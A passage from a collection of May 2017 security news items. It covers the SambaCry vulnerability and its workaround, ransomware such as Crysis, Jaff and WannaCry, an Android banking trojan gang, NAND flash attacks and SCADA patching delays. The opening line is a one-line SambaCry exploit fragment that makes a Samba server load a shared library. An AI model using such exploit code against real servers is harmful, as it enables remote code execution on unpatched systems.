simple.create_pipe("/path/to/target.so")
However, the Samba exploit has already been ported to Metasploit, a penetration testing framework, enabling researchers as well as hackers to exploit this flaw easily.
Patch and Mitigations
The maintainers of Samba has already patched the issue in their new versions Samba versions 4.6.4/4.5.10/4.4.14, and are urging those using a vulnerable version of Samba to install the patch as soon as possible.
But if you can not upgrade to the latest versions of Samba immediately, you can work around the vulnerability by adding the following line to your Samba configuration file smb.conf:
nt pipe support = no
Once added, restart the network's SMB daemon (smbd) and you are done. This change will prevent clients from fully accessing some network machines, as well as disable some expected functions for connected Windows systems.
While Linux distribution vendors, including Red Hat and Ubuntu, have already released patched versions for its users, the larger risk is that from NAS device consumers that might not be updated as quickly.
Craig Williams of Cisco said that given the fact that most NAS devices run Samba and have very valuable data, the vulnerability "has potential to be the first large-scale Linux ransomware worm."
Update: Samba maintainers have also provided patches for older and unsupported versions of Samba.
Meanwhile, Netgear released a security advisory for CVE-2017-7494, saying a large number of its routers and NAS product models are affected by the flaw because they use Samba version 3.5.0 or later.
However, the company currently released firmware fixes for only ReadyNAS products running OS 6.x.

Master Keys for Crysis ransomware released on a forum
25.5.2017 securityaffairs Ransomware

Researchers at ESET security firm have discovered that someone has released 200 master keys for the latest variants of the prominent Crysis ransomware.
While security experts continue to investigate the WannaCry attack, someone has released 200 master keys for the latest variants of the prominent Crysis ransomware. The file encrypted by this version have the .wallet and .onion extension added to their original name.

Antivirus firm ESET has used the leaked information to develop the ESET Crysis decrypting tool that is available for download on the company “utilities page.”

The master keys were posted by a new member of a forum at BleepingComputer.com that aim to help victims of this threat.

crysis ransomware

This is the third time that someone published the master key for the Crysis ransomware.

“This has become a habit of the Crysis operators lately – with this being the third time keys were released in this manner. Since the last set of decryption keys was published, Crysis ransomware attacks have been detected by our systems over ten thousand times.” reads the blog post published by ESET.

Decryption tools allow victims of the ransomware-based campaigns to restore their files without paying the ransom to the criminal organizations.

Recently the Quarkslab researcher, Adrien Guinet, has published a software, called Wanadecrypt, he used to recover the decryption key required to restore the files on an infected XP computer. The expert successfully tested the Wanadecrypt software on a small number of infected XP computers, but it is not clear if the technique works on every PC.

The technique devised by Adrien Guinet allows retrieving the secret encryption keys used by the WannaCry ransomware for free, it works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 operating systems.

Security researcher Benjamin Delpy developed another tool called WanaKiwi that not only retrieve the prime numbers from the memory but automate the whole decryption process of the WannaCry-infected files.

WanaKiwi works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 as explained by Matt Suiche from security firm Comae Technologies.

Despite the efforts of law enforcement and security firms in the fights against ransomware, this category of malware remains one of the most dangerous computer threats. Prevention is essential in keeping users safe.

“Prevention is essential in keeping users safe. Therefore, we recommend that all users keep their operating systems and software updated, use reliable security solutions with multiple layers of protection, and regularly back up all important and valuable data at an offline location (such as external storage).” concluded ESET.

Microsoft Unveils Special Version of Windows 10 For Chinese Government
25.5.2017 thehackernews IT
China is very strict about censorship, which is why the country has become very paranoid when it comes to adopting foreign technologies.
The country banned Microsoft's Windows operating system on government computers in 2014 amid concerns about security and US surveillance.
Even in the wake of that, China had been pushing its custom version of Windows XP and its forked version of Ubuntu Linux.
To deal with this issue and target the world's largest market, Microsoft's CEO for the Greater China region last year confirmed that the company was working on a Chinese version of Windows 10 that included "more management and security controls" and less bloatware.
Now, Microsoft has just announced a new version of its Windows 10, which is now ready for Chinese government agencies to use.
In its event in Shanghai on Tuesday, Microsoft announced Windows 10 China Government Edition specifically designed for the Chinese government.The OS is based on Windows 10 Enterprise Edition, but with a few tweaks to keep Chinese officials happy.
Windows 10 Enterprise Edition already provides several security, identity, and manageability features governments and enterprises need, but Windows 10 China Government Edition will let the country use the management feature to monitor and deploy updates as needed, manage telemetry, and use its own encrypted algorithms.
Designed to work with Chinese Encryption Algorithms
Microsoft enables the Chinese government to use its own encrypted algorithms in its Windows 10 China Government Edition in order to secure data that they do not want others to see.
Allows to Remove Unwanted Apps
The Chinese version of Windows 10 does not allow access to features that are not needed by Chinese government employees like Microsoft's OneDrive service that let people store their documents and files on Microsoft-controlled data centers.
Apparently, the Chinese officials don't want anyone to access their data, so they will keep their data locked down on their own computers in an attempt to have full control over it.
Manage Telemetry Data Collection & Updates
The last year's outcry over Microsoft's silent slurping of telemetry data from users' computers might have made the Chinese officials ask for the control over telemetry of its China version of Windows, preventing Microsoft to collect data on its citizen.
So basically, all Windows 10 users around the world do not have any option to turn off telemetry, but the Chinese government could do so.
"For more than two decades, Microsoft has had the distinct honor to work in China, learning and advancing technology together," executive vice president Terry Myerson writes on the Windows 10 Blog.
"Over the last two years, we have earnestly cooperated with the Chinese government on the security review of Windows 10. The Chinese government has the highest standards for security."
A release date for the Windows 10 China Government Edition have not yet announced, but three Chinese government groups have already announced their plans to adopt Windows 10 China Government Edition.
These three government groups are China Customs, Westone Information Technology and the City of Shanghai on the national, state-owned and regional enterprise levels, respectively.
Besides this, Lenovo has also announced its plans to be the first OEM partner to have devices that come preinstalled with Windows 10 China Government Edition.

New Jaff Ransomware Variant Emerges

25.5.2017 securityweek Ransomware

Although it dominated headlines over the past couple of weeks, WannaCry wasn’t the only ransomware family running rampant. Another active threats was Jaff, a ransomware family that emerged just days before the WannaCry outbreak.

Right from the start, Jaff stood out because it was being distributed by the Necurs botnet and was using a similar ransom page design as Locky. Thus, it didn’t take long for security researchers to associate the new threat with the actors behind Locky and Dridex, who also launched the Bart ransomware last year.

The ransomware was appending the .jaff extension to the encrypted files and demanding a huge ransom, at around 2 Bitcoin. The infection vector was .PDF files sent as attachments in spam emails.

A newly observed Jaff variant continues to use Necurs and PDF files for infection, but moved away from the .jaff extension and the Locky-like ransom note, Brad Duncan, Palo Alto Networks threat intelligence analyst and handler at the SANS Internet Storm Center, says.

The ransomware now appends the .wlu extension to the encrypted files and uses a ransom note featuring green fonts on a dark background. The security researcher also noticed that the ransomware authors ask for a 0.35630347 Bitcoin ransom now.

First observed on Tuesday, May 23, the spam emails distributing the new Jaff variant use a fake invoice theme. These messages feature a PDF attachment that contains an embedded Word document with malicious macros designed to infect the machine with rasomware.

“The Word macros generate an initial URL to download an encoded Jaff binary, then we see one other URL for post-infection callback from an infected host. The initial HTTP request for Jaff returns an encoded binary that's been XORed with the ASCII string I6cqcYo7wQ,” Duncan reveals.

The same as the initial Jaff variant, the new version targets over 400 file types. After completing the encryption process, it drops a ransom note to inform the victim on what happened and to provide information on how they can pay the ransom.

Because of its alleged connection with a large crime group, Jaff has the potential of becoming a major threat fast. WannaCry might have stolen the headlines for the past days, but Jaff is slowly growing to become a prevalent threat.

Vera Enables Multi-Factor Authentication for Specific Data

25.5.2017 securityweek Safety
Multi-factor authentication (MFA) is the security industry's response to failings in the simple and traditional userID/password authentication approach. MFA is considered to be a primary solution to help defeat phishing and to demonstrate compliance. But it suffers from one major drawback: user friction.

Put simply, MFA delays business. Users don't like it, and business managers see it as a delay in business processes. The industry is responding with attempts to reduce that friction. Earlier this week, Preempt launched a product that applies behavioral-based MFA to specified applications. Now Vera has announced an add-on to its data-centric solution that allows MFA to be limited to specified data.

Vera's methodology is to attach the additional authentication requirement to an existing data classification. Assuming particularly sensitive data is already classified within the Vera product as 'secret' (or perhaps, given the imminence of the European General Data Protection Regulation (GDPR), as 'PII'), then the additional MFA will be automatically applied to all such labeled data.

The result is that any attempted access to that data -- wherever the data is located or whomever the applicant is -- will result in an MFA challenge. This process defends the data against successful phishing (an attacker may steal log-in credentials, but won't get by the MFA challenge) and simultaneously helps ensure compliance with PII-protecting regulations.

"Providing the right level of protection to enterprise data is," explains Prakash Linga, CTO and co-founder of Vera, "key to complying with regulations like the NY DFS and the EU GDPR. Furthermore, the ability to layer context-driven authentication to specific files and emails lets companies appropriately protect their information wherever it travels."

The process does not require that all recipients of Vera MFA-protected data be Vera customers. If a protected document is sent to a trusted but external recipient, Vera will first validate the email address and then challenge the recipient with Vera's native two-factor Twilio-based authentication challenge.

"Alongside our own native capabilities, we're also launching integrations with Duo Security and RSA SecureID to let businesses simplify their multi-factor authentication strategy," announced Chuck Holland, Vera's director of product management, in an associated blog post. The Duo and SecureID are 'out-of-the-box' plug and play integrations.

Earlier this month, Vera announced a strategic investment of $15 million led by Hasso Plattner Ventures. Yair Re'em, general partner of Hasso Plattner Ventures, said at the time his firm's first venture into cybersecurity is prompted by "the crumbling state of enterprise security [which] has clearly demonstrated the need for a fundamental paradigm shift in cybersecurity."

Talking about Vera's adoption of data-centric security over perimeter-based security, new board member Chris Rust said, "The enterprise network perimeter has collapsed and those clinging to solutions trying to save or resurrect it are fighting a battle long since lost. Vera is the driving force behind a positive and profound shift away from perimeter-based security and towards a more flexible and reliable data-centric model."

Vera's new MFA offering adds strong authentication to corporate data wherever it travels.

Ex-CIA Chief Says He Warned Russia to Stay Out of Election

25.5.2017 securityweek CyberSpy
Former CIA director John Brennan said Tuesday that he warned Russia last summer against meddling in the US presidential election but the Russians went ahead and did it, anyway.

"It should be clear to everyone that Russia interfered in our 2016 presidential election process," Brennan said in testimony to the House Intelligence Committee, which is investigating possible collusion between Russia and President Donald Trump's campaign.

"And that they undertook the activities despite our strong protests and explicit warning they not do so," said Brennan, who served as CIA director from 2013 until January of this year when Trump took office.

Brennan told how he called the head of the Russian intelligence service, the FSB, on August 4 of last year.

"I said that all Americans, regardless of political affiliation or whom they might support in the election, cherished their ability to elect their own leaders without outside interference," Brennan said.

"I said American voters would be outraged by any attempt to interfere in the election," he added.

Brennan's interlocutor denied any Russian interference but said he would pass on the warning to President Vladimir Putin, the ex-CIA chief said.

Brennan reiterated that the CIA detected in 2016 possible signs of collusion between Trump associates and Russian officials.

Those contacts are now being investigated by committees in both chambers of the US Congress and by recently appointed special counsel Robert Mueller, a former FBI director.

"I encountered and became aware of information and intelligence that revealed contacts and interactions between Russian officials and US persons involved in the Trump campaign," Brennan said.

He said he did not know if this amounted to outright collusion.

"I know there was a sufficient basis of information and intelligence that required further investigation" by the FBI, he added.

Trump vehemently denies any collusion and says he is the victim of an unprecedented witch hunt.

Brennan also addressed news reports that Trump, in an Oval Office meeting this month with the Russian foreign minister and ambassador, shared highly classified information provided by a US ally about an Islamic State group plot to bring down civilian airliners with bombs hidden in laptop computers.

Brennan said that if these reports are true, Trump violated two intelligence protocols.

First, he said, such intelligence is not shared with ambassadors but rather through intelligence channels.

And before such intelligence is shared, the country that provided it must be warned so as not to jeopardize sources or methods, Brennan said.

"It appears, at least from the press reports, that neither did it go in the proper channels nor did the originating agency have the opportunity to clear language for it," Brennan said.

"That is a problem."

Samsung Investigating Galaxy S8 'Iris Hack'

25.5.2017 securityweek Mobil
Samsung Electronics is investigating claims by a German hacking group that it fooled the iris recognition system of the new flagship Galaxy S8 device, the firm said Wednesday.

The launch of the Galaxy S8 was a key step for the world's largest smartphone maker as it sought to move on from last year's humiliating withdrawal of the fire-prone Galaxy Note 7s, which hammered the firm's once-stellar reputation.

But a video posted by the Chaos Computer Club (CCC), a German hacking group founded in 1981, shows the Galaxy S8 being unlocked using a printed photo of the owner's eye covered with a contact lens to replicate the curvature of a real eyeball.

"A high-resolution picture from the internet is sufficient to capture an iris," CCC spokesman Dirk Engling said, adding: "Ironically, we got the best results with laser printers made by Samsung."

A Samsung spokeswoman said it was aware of the report and was investigating.

The iris scanning technology was "developed through rigorous testing", the firm said in a statement as it sought to reassure customers.

"If there is a potential vulnerability or the advent of a new method that challenges our efforts to ensure security at any time, we will respond as quickly as possible to resolve the issue."

Samsung's hopes of competing against archrival Apple's iPhone had been pinned on the Galaxy S8 after last year's Note 7 disaster.

The recall debacle cost Samsung billions of dollars in lost profits and hammered its global credibility, forcing it to apologise to consumers and postpone the S8 launch.

But since it was released in April it has received positive reviews and strong orders.

The CCC previously demonstrated a way to defeat Apple's TouchID fingerprint sensors -- using graphite powder, a laser etching machine and wood glue -- just weeks after the first iPhone 5s hit the shelves.

Traditional PIN protection was "a safer approach than using body features for authentication", Engling said.

Apps Essential to Modern Living But Treated Carelessly: Report

25.5.2017 securityweek Security
A new research report takes an unusual angle. Rather than analyzing a threat or an attacker, it looks at the psychology of the user -- or more specifically, the user of smartphones and apps. What it found is that the modern use of apps is so interwoven with daily life, they have almost become part of their users' DNA.

The Application Intelligence Report (AIR: PDF) is a new intelligence survey produced by A10 Networks. A10 surveyed 2,000 business and IT professionals in more than 20 different countries -- and it is important to note that these were professionals rather than unemployed teenagers glued to their phones.

The purpose, says Andrew Hickey in an associated blog, a director at A10 Networks, is to "better understand how the global workforce's experiences and behaviors with apps impact personal and corporate security... Why they use them. Their perception of personal and business security when using them. And potential behavioral risks to businesses and IT teams."

The result is sobering, and could fuel a raft of psychology and sociology theses. It first demonstrates how apps and their use is deeply interwoven into everyday life. For example, 42% of respondents globally say they 'cannot live without their apps' while another 44% said 'it would be a struggle' to live without them.

The detail varies by both age demographic and geolocation. Newly emerged and emerging economies seem particularly attached or reliant on their apps: China (99%), India (97%), Brazil (96%) and South Korea (90%). It is the older economies that seem less reliant. Germany ranks highest of participants who say, 'I can easily live without apps' (30%), followed by France (23%), and Great Britain and Japan (21%). Similarly, respondents under the age of 40 are much more likely to say they cannot live without apps than those over 40.

This basic pattern largely repeated itself throughout the survey. For example, in an emergency that would allow people to take only one item, 45% of respondents elected to grab their phone. It was 74% in China, but only 29% in France.

While details such as these are interesting and possibly surprising (perhaps depending on the reader's geolocation and age demographic), it is the attitude towards security that becomes sobering. "At least four out of five (83%) respondents either agree or strongly agree that they think about security risks when first downloading an app," says the report, "but after that, security becomes much less of a thought or priority in dictating behavior."

One reason seems to be a belief that it is the developer, or the company IT department, that is responsible for app security. Forty-seven percent of respondents "expect to be protected from cyber-attacks by either their company or third-party app developers."

This lax personal attitude to security best shows itself in the use of passwords. One in 10 (11%) of all respondents said they never change their passwords for their apps, while another three out of 10 (29%) use the same password for the majority of their apps. Fewer than one in five (17%) use a different password for every app. The usual demographics apply: 50% of the 21-30 demographic either never change passwords or use the same password the majority of the time, compared with only 26% of those aged over 50.

Surprisingly, the US (49%) is second only to South Korea (52%) in using the same password for the majority of apps -- but less surprisingly, Germany leads in best practices for those who use different passwords (34%).

The effect of poor personal security is born out in practice. Globally, 13% of all respondents have been the victim of identity theft. This grows to 39% in China (a figure that, pro rata, suggests more people than the entire population of the US). Thirty-one percent of respondents have had their phone hacked; and 24% of respondents under the age of 30 have had their phone stolen.

A10 Network draws few conclusions from this report, instead inviting its study and promising to 'dig deeper' in the future. "From a cultural perspective," blogs Hickey, "IT can study the app-blended life, consider user behavior as a factor in security planning, build enterprise-wide security awareness and influence a security-minded culture.

"And from a technology perspective, IT pros can use this data to make the case for improved per-app visibility, per-app analytics, performance, removal of security blind spots and implementation of tighter controls across all application environments." But one thing is immediately obvious: companies with a BYOD policy cannot afford to leave the security of mobile devices to the user.

Target agreed to pay $18.5 Million over 2013 data breach
25.5.2017 securityaffairs Incindent

Target, the US retail giant, has entered a settlement with the US Attorneys General and it has agreed to pay $18.5 million over the 2013 data breach.
Target, the US retail giant, has entered a settlement with the Attorneys General of 47 states and it has agreed to pay $18.5 million over the data breach suffered in 2013.

Nearly 40 Million credit and debit card accounts belonging to Target customers have been stolen during the traditional holiday shopping season in 2013.

The company intends to compensate the costs incurred by its customers and to compensate for the damage it has caused to the consumers.

Target data breach

The company will pay the overall amount of money to all the Attorneys General involved in the investigations, $1.2 million will be paid to the Illinois Attorneys General and roughly $1 million to the Connecticut that lead the legal action against the company.

According to the settlement, Target accepted to implement an information security program to protect its customer.

“TARGET shall, within one hundred and eighty ( 180) days after the Effective Date of this Assurance, develop, implement, and maintain a comprehensive information security program (” Information Security Program”) that is reasonably designed to protect the security, integrity, and confidentiality of Personal Information it collects or obtains from Consumers.” reads the settlement.

The Information Security Program shall cover administrative, technical, and physical safeguards appropriate to:

The size and complexity of TARGET’ s operations;
The nature and scope of TARGET’ s activities;
The sensitivity of the Personal Information that TARGET maintains.
The company will adopt further measures to protect its customers, including network segmentation, access control, and management, file integrity monitoring, whitelisting, logging, change control, and the adoption of payment card security technologies.

The settlement established that the cyber security of the company’s systems must be assessed by a third-party, at the same time the company has to audit any vendor or subcontractor it works with. Let’s remind that the hackers that broke into the company payment systems used as entry point an HVAC contractor.

Target admitted last year that the data breach had cost it $290 million, the company paid $67 million to Visa card issuers, $19 million to MasterCard card issuers, over $20 million to banks and credit unions, and $10 million to the affected consumers.

The NAND Busters Data Storage Chips Vulnerable to Attack
25.5.2017 securityaffairs Vulnerebility

Experts found that NAND Data Storage Chips are vulnerable to malicious programs which can corrupt data and even destroy them over time.
Researchers at Carnegie Mellon University, Seagate Technology and Swiss Federal Institute of Technology in Zürich have uncovered a potential flaw in the storage devices that power most cell phones, computers and big data centers around the world. The researchers found that the special chip arrays used to store information are vulnerable to malicious programs which can corrupt data and even destroy the chips over time.

NAND flash memory chips installed on a board array are called solid-state drives (SSDs). The SSDs have all but replaced the venerable magnetic disk hard drives, allowing manufacturers to reduce the size and weight of electronic devices. NAND flash memory chips are found inside most of the current state of the art electronics and often occupy space in our pockets from portable phones, cameras, and USB drives. They are also the heart of massive data centers that power the cloud, holding vast amounts of data for individuals, major corporations, and government.

A key feature of the NAND flash chip is its ability to store a charge without power. The NAND chip contains billions of cells each with different electrical charges which represent the binary ones and zeros that make up data. They are also controlled by an internal architecture which is designed to keep all that data in order. The researchers, working with the assistance of Intel and Seagate, found that the cells inside each chip can be corrupted by programs which abuse the sub-scale electronics and can eventually render them useless.

NAND attacks

Once such exploit discovered by the researchers is a program that rapidly writes, reads and resets data inside a NAND storage chip. The attacker repeatedly performs this series of attacks against individual chip cells holding the binary ones and zeros, causing them to overload and generate interference against other nearby “victim” cells inside the chip. The result is a phenomenon called “Parasitic Capacitance Coupling” which changes the voltage in adjacent memory cells and thereby changes the value of the data stored inside them. The attacker can alter the data stored in targeted victim cells thus data stored by other programs is now corrupted.

As chips become smaller and more powerful, the space between the electronic connections and memory cells has been reduced as well. The fact that these electronic connections are in some cases only a few molecules apart is like having bare copper wires carrying voltage lying next to each other. They often do not have to touch to create disturbance in other nearby components.

This type of interference attack has been described to be similar to a “Row hammer” attack used against the more familiar RAM (Random Access Memory) chips inside computers, where an attacker bombards a row of memory cells in repeated read-write operations, causing electrical interference that changes the values of nearby cells.

“Row hammer” attacks are deliberately introduced interference using software programs. However, Nature can also cause similar errors inside storage memory chips operating under harsh conditions. For example, solar flares and intense radiation have been known to induce the cells inside computer chips – both RAM and Flash – to change values.

Special programming techniques and manufacturing processes called “RAD” hardening had to be introduced for chips installed inside satellites, military equipment, space craft and nuclear reactors to prevent “bit flipping”, changing cell values induced by the Electro-Magnetic Pulse (EMP) of solar flares, and radiation.

According to the researchers, a malicious program can re-create the same kind of EMP electronic interference on a sub-scale. They discovered that such software can take advantage of the NAND chip design and structure to work around safeguards to target specific cells.

While The NAND memory chip can compensate for damaged cells, as more and more cells are attacked, the chip eventually becomes useless and is unable to reliably store information. The attack can dramatically reduce the useable lifetime of the chip, forcing it to be replaced. This replacement process usually would require and entire board or bank of chips to be replaced in high-end applications such as cloud memory, an expensive and time-consuming process.

However, unlike massive cloud and computer storage arrays, the NAND flash memory chips inside consumer devices are usually not replaceable. The malicious software attack could force an entire device to be replaced such as a cell phone, notepad computer or Internet of Things device.

Researchers also discovered a second method of attack called “Read Disturb”. The attack is characterized by a malicious application to quickly perform a large number of reads in a very short amount of time, to induce “Read Disturb” errors that corrupt both data already written to the chip and data that have yet to be written. The basic concept is to corrupt unwritten blocks or cells which are not managed by the chip structure programming. The result is the un-used data cells are corrupted and cannot be repaired because they are outside of the chip management and control.

While the second level of attack does not disrupt already written data by other programs it does eventually destroy the chip and reduce its lifetime of use.

The researchers also suggested their own form of “RAD” hardening in order to reduce the chance of attacks and increase the lifetime of the NAND flash chips. The best solution was to internally buffer data being read and written to the NAND flash drive itself. The concept is that the buffer will absorb all the read and write activity and then place the data correctly into each NAND memory cell. While this method would consume additional overhead in time, up to 15%, and an additional 2 MB of storage, it would also eliminate the chip vulnerability to being corrupted by either the “Capacitance Coupling” or the “Read Disturbance” attacks.

The research paper – titled “Vulnerabilities in MLC NAND Flash Memory Programming: Experimental Analysis, Exploits, and Mitigation Techniques” is available at:

https://pdfs.semanticscholar.org/b9bc/a3c9f531002854af48de121cdcc8e0520c7f.pdf

Charles R. Smith is CEO of Softwar Inc. a US based information warfare company and a former national security journalist. You can find Softwar at https://www.softwar.net

Qatar's State News Agency Hacked by 'Unknown Entity': Official

24.5.2017 securityweek Hacking
Qatar said Wednesday its official state news agency was hacked and subsequently carried a "false statement" on sensitive regional topics attributed to the country's Emir, Sheikh Tamim bin Hamad Al-Thani.

Amid an apparent wide-scale security breach it was also reported that the agency's official Twitter account had also been attacked.

Among the issues allegedly addressed by the Qatari ruler in the statement were the Palestinian-Israeli conflict, strategic relations with Iran, and comments about Hamas.

There were also alleged negative remarks about Qatar's relationship with the new administration of US President Donald Trump.

Amid the confusion, Doha said the statement which had appeared on its website and was attributed to the country's ruler was completely untrue.

"The Qatar News Agency website has been hacked by an unknown entity," reported the Government Communications Office in a statement.

"A false statement attributed to His Highness has been published."

The communications office added that an investigation would be launched into the security breach.

The "false statement" posted online claimed the emir spoke on Tuesday, two days after the Qatari leader and Trump met in Saudi Arabia as part of the president's recent visit to the Middle East.

The remarks on QNA were picked up and reported by broadcasters in the region, including some in the United Arab Emirates.

They also caused a stir on social media in the Gulf, before Doha scrambled in the early hours of Wednesday morning to deny the claims.

Doha-based broadcaster Al Jazeera also reported that the QNA Twitter account had been hacked and "fake" reports that Qatar was withdrawing ambassadors from several countries in the region were subsequently denied.

The communications office added that the "State of Qatar will hold all those" who committed the breach accountable.

The attack on Qatar's official news agency comes just days after Doha claimed it had been the victim of an orchestrated smear campaign over its alleged "support" for terrorism.

Last weekend, Doha's communications office released an official statement claiming the gas-rich emirate was being attacked by anti-Qatar organisations.

Doha has faced criticism in some quarters for its support of rebel groups fighting Syrian President Bashar al-Assad.

In recent weeks, Qatar has been accused outright of terror funding in articles which have appeared in the American media.

Qatar is also home to the former leader of Hamas, Khaled Meshaal, who earlier this month used his Doha base, where he has lived in exile for several years, to launch a new policy document.

Russian Hackers Infected 1 Million Phones With Banking Trojan

24.5.2017 securityweek Virus
Russia Dismantles Major Cybercrime Operation Targeting Bank Accounts via Android Malware

The Russian Interior Ministry announced on Monday that authorities dismantled a major cybercrime gang that had stolen nearly $900,000 from bank accounts after infecting more than one million Android smartphones with a Trojan.

Authorities said they identified 20 suspects in Moscow and five other regions of Russia. They believe the group was led by a 30-year-old living in the city of Ivanovo.

Group-IB, the Russian cybersecurity firm that assisted the government’s investigation, reported that 16 members of the group were detained in November 2016, while the last active member was apprehended in April.

The group used an Android banking Trojan dubbed “Cron,” which researchers first spotted in March 2015, when cybercriminals had been distributing it disguised as Viber and Google Play apps.

Roughly one year later, experts noticed that someone had offered to rent an Android banking Trojan dubbed “Cron Bot.” In an analysis of the mobile malware market, IBM X-Force researchers reported in April 2016 that Cron Bot had been leased for between $4,000 and $7,000, depending on the package.

The cybercrime gang targeted by Russian authorities used spam SMS messages to deliver the Trojan to individuals in Russia. The messages informed recipients that their ads or photos had been posted on a website, and included links to a site that tricked users into downloading and installing the malware. The threat had been disguised as various apps, including Avito, Pornhub, Framaroot and Navitel.

Once it infected a device, the Trojan allowed the cybercrooks to steal and hide SMS messages coming from banks, and send SMSs to specified numbers. Since many Russian banks allow their customers to conduct transactions via SMS, these features allowed the fraudsters to transfer money from the victims’ accounts into their own.

According to Group-IB, the gang opened more than 6,000 bank accounts to which they transferred the stolen funds. Investigators said the Cron malware was used to steal an average of $100 (8,000 rubles) from 50-60 bank customers each day.

The cybercriminals managed to infect more than one million smartphones and stole nearly $900,000 (50 million rubles).

Following the success of their operation in Russia, the group decided to expand to other countries with the aid of a banking Trojan named Tiny.z, which they rented for $2,000 per month. Tiny.z uses overlay screens adapted to each targeted bank’s mobile application in order to trick victims into handing over personal and financial details that can be leveraged to steal money from their account.

The Cron gang had been planning on hitting France first, and they developed web injections for several of the country’s banks, including Credit Agricole, Assurance Banque, Banque Populaire, BNP Paribas, Boursorama, Caisse d'Epargne, Societe Generale and LCL. However, law enforcement managed to disrupt their operations before they could launch attacks on French banks.

WannaCry 'Highly Likely' Work of North Korean-linked Hackers, Symantec Says

24.5.2017 securityweek Ransomware
North Korea-linked Lazarus Hacking Group is "Highly Likely" to be Responsible for the Global "WannaCry" Ransomware Attack, Symantec Says

Analysis of the tools and infrastructure used in the WannaCry ransomware attacks reveal a tight connection between the threat and the North Korean hacking group Lazarus, Symantec claims.

The global outbreak on May 12 drew the world’s attention to WannaCry, but the threat had been active before that, the security researchers say. Over 400,000 machines have been hit by WannaCry to date, although not all had been infected, courtesy of a kill-switch domain registered shortly after the attack began.

The first WannaCry variant, however, emerged in February, and security researchers already discovered a possible tie between it and the Lazarus group, although some suggested such a connection was far-fetched.

North Korea has denied involvement in the ransomware outbreak.

The Lazarus group (also known as BlueNoroff) was previously associated with a number of devastating attacks, including the Sony Pictures hack in 2014 and the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016. Recently, Kaspersky suggested that the group could be the most serious threat to banks.

Symantec now says that tools previously associated with the group were found on computers infected with WannaCry. Before the May 12 attack, the ransomware was used in a small number of targeted campaigns in February, March, and April, and the variants are almost identical, save for the method of propagation (the recent version uses the NSA-linked EternalBlue exploit).

According to Symantec, these attacks show “substantial commonalities in the tools, techniques, and infrastructure used by the attackers and those seen in previous Lazarus attacks, making it highly likely that Lazarus was behind the spread of WannaCry.”

Despite that, however, “the WannaCry attacks do not bear the hallmarks of a nation-state campaign but are more typical of a cybercrime campaign,” the security researchers admit. Prior to the May 12 campaign, WannaCry was using stolen credentials to spread across infected networks and didn’t employ the leaked EternalBlue exploit.

After the first WannaCry attack in February, experts discovered three pieces of malware linked to Lazarus on the victim’s network, including the Volgmer Trojan and two variants of the Destover backdoor (the disk-wiping tool used in the Sony Pictures attacks).

Moreover, the researchers discovered that WannaCry used the Alphanc Trojan for distribution in the March and April attacks, and that this malicious program is a modified version of the Lazarus-linked Duuzer backdoor.

Symantec also found the Bravonc backdoor, which has similar code obfuscation as WannaCry and Fakepude info-stealer (also linked to Lazarus), and the Bravonc Trojan, which used the same IP addresses for command and control (C&C) as Duuzer and Destover, both linked to Lazarus.

Finally, there is the shared code between the previous WannaCry ransomware version and the Lazarus-linked Contopee backdoor.

The February WannaCry attack hit a single organization but compromised over 100 computers within two minutes after the initial infection. A variant of the Mimikatz password-dumping tool was used for compromise, with a second tool used to copy and execute WannaCry on other network computers using the stolen passwords.

In addition to these tools, the security researchers found five other pieces of malware on a second computer on the victim’s network, and three of them were linked to Lazarus: Volgmer and the two variants of Destover.

A new sample of WannaCry emerged in late March, and five organizations were infected with it. The Alphanc and Bravonc backdoors were employed in these attacks, with the former used to drop WannaCry onto the compromised computers of at least two victims. Alphanc is believed to be an evolution of Duuzer, a sub-family of the Destover wiping tool used in the Sony attacks.

These attacks hit organizations spanning a range of sectors and geographies, but Symantec found evidence of the tools used in the February attacks on the computers compromised in March and April as well.

The Bravonc Trojan was used to deliver WannaCry to the computers of at least two other victims, the security researchers say. The malware connects to a C&C server hosted at the same IP address as the IP address used by Destover and Duuzer samples, and which was also referred to in a Blue Coat report last year.

“The incorporation of EternalBlue transformed WannaCry from a dangerous threat that could only be used in a limited number of targeted attacks to one of the most virulent strains of malware seen in recent years. It caused widespread disruption, both to organizations infected and to organizations forced to take computers offline for software updates,” Symantec explained.

The security firm also notes that the passwords used to encrypt the ZIP files embedded in the WannaCry dropper are similar across versions ("wcry@123", "wcry@2016", and "WNcry@2ol7") suggesting they come from the same actor. Further, the use of a small number of Bitcoin addresses in the initial version and its limited spread indicates that it wasn’t a ransomware family shared across cybercrime groups.

“Aside from commonalities in the tools used to spread WannaCry, there are also a number of links between WannaCry itself and Lazarus. The ransomware shares some code with Backdoor.Contopee, malware that has previously been linked to Lazarus. One variant of Contopee uses a custom SSL implementation, with an identical cipher suite, which is also used by WannaCry. The cipher suite in both samples has the same set of 75 different ciphers to choose from (as opposed to OpenSSL where there are over 300),” Symantec says.

The small number of earlier WannaCry attacks provides sufficient evidence to link the ransomware to Lazarus, Symantec says, given the significant use of tools, code, and infrastructures previously associated with the group. The company also notes that leak of the EternalBlue exploit was what turned the malware into a far more potent threat than it would have been if it continued to use own tools.

Average Patching Time for SCADA Flaws Is 150 Days: Report

24.5.2017 securityweek ICS
Supervisory control and data acquisition (SCADA) systems, particularly human-machine interfaces (HMI), can be a tempting target for malicious actors, but it takes vendors, on average, 150 days to patch vulnerabilities in these types of products, according to a new report from Trend Micro and the Zero Day Initiative (ZDI).

The report published on Tuesday is based on the analysis of hundreds of vulnerabilities documented in 2015 and 2016 by ICS-CERT and ZDI.

Researchers pointed out that attackers may target the HMI of a SCADA system for several reasons. Since HMI is a critical component in the management of industrial systems, including critical infrastructure, it can provide access to information that may be highly valuable in a sophisticated attack.

Attackers can also cause physical damage to SCADA equipment once they have compromised the HMI. Furthermore, malicious actors could leverage the HMI to disable alarms and notifications designed to alert operators of dangerous configurations or values.

Since HMIs are typically Windows-based applications rather than web-based apps, vulnerabilities such as cross-site scripting (XSS) and cross-site request forgery (CSRF) are less common. The most common types of flaws uncovered in the past two years are related to lack of authentication/authorization and weak default configurations (23%), memory corruption bugs (20%), credential management vulnerabilities (19%), and code injections (9%).

The average time from disclosure to the release of a patch has not improved much in the past four years. While there are some vendors that manage to patch SCADA vulnerabilities within one week of disclosure, the average time has been roughly 150 days in 2015 and 2016.

Experts pointed out that some smaller vendors, such as Cogent Real-Time Systems and Trihedral Engineering, patch vulnerabilities faster, while larger companies, such as ABB and GE, have an average response time of more than 220 days.

